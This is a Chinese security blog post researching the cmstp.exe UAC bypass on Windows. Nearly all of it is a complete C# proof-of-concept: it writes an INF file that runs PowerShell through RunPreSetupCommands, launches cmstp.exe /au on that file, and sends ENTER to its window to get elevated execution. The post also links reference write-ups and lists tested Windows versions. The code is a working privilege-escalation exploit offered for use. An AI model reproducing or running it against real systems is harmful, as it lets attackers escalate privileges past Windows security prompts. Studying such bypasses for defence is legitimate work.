cmstp bypassuac研究
参考链接:
https://www.anquanke.com/post/id/86685
https://mp.weixin.qq.com/s/dhh73wWhbo_dfYN-oBDW6g
对应的powershell脚本:
https://gist.github.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1#file-uacbypasscmstp-ps1
测试系统:
* windows 10
* windows 7
* windows server 2012
* windows server 2008
C# 改造：将上面引用的 PowerShell 脚本（写入 INF → 启动 cmstp.exe /au → 找到窗口并发送回车）改写为 C#，代码如下。
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
using System.IO;
using System.Threading.Tasks;
namespace cmstp_bypassuac
{
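/// <summary>
/// Proof of concept for the cmstp.exe UAC bypass described in the referenced
/// write-ups: write an INF whose RunPreSetupCommands section launches
/// PowerShell, start <c>cmstp.exe /au &lt;inf&gt;</c>, wait for its window,
/// bring it to the foreground and press ENTER. The INF is written to the
/// current working directory and is NOT removed afterwards, so it remains on
/// disk as an artifact after the run.
/// </summary>
class Program
{
    [DllImport("user32.dll", SetLastError = true)]
    public static extern bool SetForegroundWindow(IntPtr hWnd);

    /// <summary>INF file name, written to the current working directory.</summary>
    private const string InfFileName = "test.inf";

    /// <summary>Command placed in the INF's RunPreSetupCommands section.</summary>
    private const string PayloadCommand = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe";

    /// <summary>Upper bound on how long Main waits for the cmstp.exe window.</summary>
    private static readonly TimeSpan WindowTimeout = TimeSpan.FromSeconds(10);

    /// <summary>Delay between two polls of the process list while waiting for the window.</summary>
    private static readonly TimeSpan PollInterval = TimeSpan.FromMilliseconds(100);

    /// <summary>
    /// Writes the INF consumed by <c>cmstp.exe /au</c> into the current working
    /// directory.
    /// </summary>
    /// <returns>
    /// The full path of the written INF, or "" if the file does not exist after
    /// writing. <see cref="File.WriteAllText(string, string)"/> throws on I/O
    /// failure, so "" is only reached if the file vanished in between.
    /// </returns>
    public static string createinf()
    {
        // The template has exactly one placeholder, {0}, for the payload command;
        // any other brace in the INF text would make string.Format throw.
        // The taskkill line kills cmstp.exe right after the payload starts so the
        // connection-manager installer UI does not stay open.
        // NOTE(review): the referenced gist writes the registry line as
        // "%UnexpectedError%" with no spaces around the percent signs; the copy
        // below carries spaces, which may be a rendering artifact of the page —
        // confirm against the original INF before relying on it.
        // The ShortSvcName line now carries its closing quote like the
        // ServiceName line above it; the original literal ended with
        // ""CorpVPN"; which dropped the quote from the generated INF.
        string template = @"[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection
[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
{0}
taskkill /IM cmstp.exe /F
[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7
[AllUSer_LDIDSection]
""HKLM"", ""SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE"", ""ProfileInstallPath"", "" % UnexpectedError % "", """"
[Strings]
ServiceName = ""CorpVPN""
ShortSvcName = ""CorpVPN""";

        string infText = string.Format(template, PayloadCommand);
        // Path.Combine instead of cwd + "\\" + name: avoids a doubled separator
        // when the working directory is a drive root such as C:\.
        string infPath = Path.Combine(Directory.GetCurrentDirectory(), InfFileName);
        File.WriteAllText(infPath, infText);

        if (!File.Exists(infPath))
        {
            Console.WriteLine("Create Inf File Failure...");
            return "";
        }

        Console.WriteLine("Create Inf File is ok");
        return infPath;
    }

    /// <summary>
    /// Looks up a running cmstp.exe and returns its main window handle.
    /// </summary>
    /// <returns>
    /// The main window handle of the first cmstp.exe process found; IntPtr.Zero
    /// (after printing a message) when no cmstp.exe is running, or IntPtr.Zero
    /// silently when the process exists but has not created its window yet.
    /// </returns>
    public static IntPtr execute()
    {
        IntPtr windowHandle;
        if (!TryGetCmstpWindow(out windowHandle))
        {
            Console.WriteLine("Not Found cmstp handle,exit....");
            return IntPtr.Zero;
        }
        return windowHandle;
    }

    /// <summary>
    /// Quiet lookup shared by <see cref="execute"/> and the polling loop.
    /// </summary>
    /// <param name="windowHandle">
    /// Main window handle of the first cmstp.exe process, or IntPtr.Zero if it
    /// has no window yet. Undefined when the method returns false.
    /// </param>
    /// <returns>true if at least one cmstp.exe process exists.</returns>
    private static bool TryGetCmstpWindow(out IntPtr windowHandle)
    {
        windowHandle = IntPtr.Zero;
        Process[] found = Process.GetProcessesByName("cmstp");
        try
        {
            if (found.Length == 0)
            {
                return false;
            }
            // MainWindowHandle is cached on the Process object; Refresh() so a
            // window created after the snapshot was taken is picked up.
            found[0].Refresh();
            windowHandle = found[0].MainWindowHandle;
            return true;
        }
        finally
        {
            // Each Process object owns an OS handle; the original never
            // disposed them and leaked one per poll iteration.
            foreach (Process p in found)
            {
                p.Dispose();
            }
        }
    }

    /// <summary>
    /// Polls for the cmstp.exe main window until it appears or
    /// <paramref name="timeout"/> elapses. The window is not available
    /// immediately after Process.Start, hence the polling; the original spun
    /// on execute() with no sleep and no exit condition, so it burned a core
    /// and hung forever if cmstp.exe never showed a window (or exited).
    /// </summary>
    /// <param name="timeout">Maximum time to wait.</param>
    /// <returns>The window handle, or IntPtr.Zero on timeout.</returns>
    private static IntPtr WaitForCmstpWindow(TimeSpan timeout)
    {
        Stopwatch clock = Stopwatch.StartNew();
        while (clock.Elapsed < timeout)
        {
            IntPtr windowHandle;
            if (TryGetCmstpWindow(out windowHandle) && windowHandle != IntPtr.Zero)
            {
                return windowHandle;
            }
            System.Threading.Thread.Sleep(PollInterval);
        }
        return IntPtr.Zero;
    }

    /// <summary>
    /// Entry point: write the INF, launch cmstp.exe on it, wait for the window
    /// and press ENTER. Exits early (with a message on the console) if the INF
    /// could not be written, the window never appeared, or it could not be
    /// brought to the foreground.
    /// </summary>
    static void Main(string[] args)
    {
        string infPath = createinf();
        if (infPath.Length == 0)
        {
            return;
        }

        ProcessStartInfo startInfo = new ProcessStartInfo("C:\\Windows\\System32\\cmstp.exe");
        startInfo.Arguments = "/au \"" + infPath + "\"";
        startInfo.UseShellExecute = false;

        // Dispose the launched Process handle when done; lookup by name is kept
        // from the original because the window is resolved from the process list.
        using (Process cmstp = Process.Start(startInfo))
        {
            IntPtr windowHandle = WaitForCmstpWindow(WindowTimeout);
            if (windowHandle == IntPtr.Zero)
            {
                Console.WriteLine("Timed out waiting for the cmstp window, exit....");
                return;
            }

            Console.WriteLine("The Cmstp Handle:" + windowHandle);

            // SendKeys types into whatever window is in the foreground, so do not
            // press ENTER unless cmstp's window actually got focus. Windows may
            // refuse the foreground switch (e.g. foreground-lock rules); the
            // original ignored the return value and sent ENTER regardless.
            if (!SetForegroundWindow(windowHandle))
            {
                Console.WriteLine("SetForegroundWindow failed, Win32 error " + Marshal.GetLastWin32Error());
                return;
            }

            SendKeys.SendWait("{ENTER}");
        }
    }
}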
}
效果如下
文章标题:cmstp bypassuac研究
本文作者:九世
发布时间:2021-03-04, 20:58:58
最后更新:2021-03-04, 21:06:39
原始链接: http://jiushill.github.io/posts/d38c8377.html
版权声明: "署名-非商用-相同方式共享 4.0"，转载请保留原文链接及作者。